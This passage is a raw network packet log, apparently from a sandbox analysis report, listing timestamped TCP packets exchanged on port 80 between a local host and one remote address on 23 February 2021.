Feb 23, 2021 15:31:26.384049892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384076118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384095907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384105921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.384109974 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.384115934 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384141922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384196997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.384201050 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.384850025 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384897947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384923935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384948969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384973049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.384995937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385001898 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385013103 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385014057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385046959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385068893 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385087967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385091066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385096073 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385111094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385124922 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385135889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385159969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385185003 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385206938 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385217905 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385266066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385566950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385726929 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385767937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.385822058 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.385842085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425044060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425086021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425108910 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425132990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425157070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425180912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425204039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425224066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425230026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425239086 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425254107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425276995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425299883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425307989 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425312996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425323009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425344944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425367117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425412893 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425415993 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425419092 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425441980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425468922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425493956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425515890 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425523043 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425528049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425539017 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425604105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425770044 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425796032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425825119 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425827026 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425832987 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425852060 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425874949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425898075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425921917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425936937 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425941944 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.425944090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425966978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.425990105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426008940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426012039 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426016092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426040888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426064968 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426086903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426100969 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426103115 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426110983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426717043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426748037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426772118 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426796913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426806927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426816940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426826000 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426850080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426872969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426893950 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426896095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426897049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.426919937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426947117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426970959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.426995039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427000999 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427005053 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427016973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427054882 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427078009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427109957 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427112103 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427622080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427651882 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427675009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427699089 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427722931 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427723885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427731037 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427752018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427777052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427799940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427820921 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427824020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427824974 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427848101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427879095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427901983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427926064 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427937984 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427942991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.427948952 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.427973986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428011894 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428016901 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428555965 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428586006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428613901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428638935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428662062 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428704023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428729057 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428755999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428781033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428790092 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428797960 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428805113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428809881 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428829908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428857088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428880930 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428899050 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428905010 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.428906918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.428931952 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429451942 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429478884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429510117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429512978 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429523945 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429536104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429558039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429582119 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429599047 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429603100 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429606915 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429635048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429660082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429682970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429702997 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429704905 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429706097 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429729939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429753065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429778099 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429800987 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.429801941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.429805994 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430572033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430603027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430627108 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430644989 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430649996 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430653095 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430672884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430696011 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430716038 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430730104 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430732965 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430742025 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430763960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430784941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430805922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430824041 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430828094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430829048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430851936 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430874109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430896997 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.430917025 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.430921078 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431330919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431353092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431372881 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431426048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431432962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431543112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431571007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431596041 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431621075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431643009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431662083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431674957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431684971 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431689024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431690931 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431701899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431714058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431726933 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431746960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431763887 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431778908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431796074 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.431811094 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431817055 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.431921005 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432585001 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432609081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432625055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432642937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432658911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432676077 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432693005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432699919 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432707071 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432708979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432732105 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432749033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432765961 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432780027 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432790995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432822943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432846069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432863951 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432867050 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.432868958 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.432921886 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433377028 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433422089 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433446884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433473110 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433491945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433507919 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433517933 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433522940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433526993 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433540106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433559895 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433577061 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433593035 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433603048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433607101 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433609009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433625937 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433641911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433657885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.433665991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.433669090 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434317112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434341908 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434361935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434381962 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434402943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434405088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434412003 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434422016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434442043 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434462070 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434470892 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434473991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434485912 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434505939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434525967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434529066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434531927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434545994 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434566021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434586048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.434598923 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434602022 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.434606075 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435749054 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435779095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435798883 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435820103 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435838938 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435847998 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435853958 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435862064 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435885906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435904980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435910940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435914040 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435926914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435945988 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435966969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.435981989 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435985088 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.435991049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436012983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436033010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436053991 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436073065 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436079025 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436105967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436127901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436146975 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436168909 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436189890 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436211109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436229944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436250925 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436275005 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436285019 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436290026 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436296940 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436319113 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436337948 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436358929 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436378956 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436398029 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436398983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.436402082 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.436472893 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437047958 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437077999 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437102079 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437135935 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:26.437443972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437469006 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:26.437491894 CET	80	49755	172.67.172.17	192.168.2.4
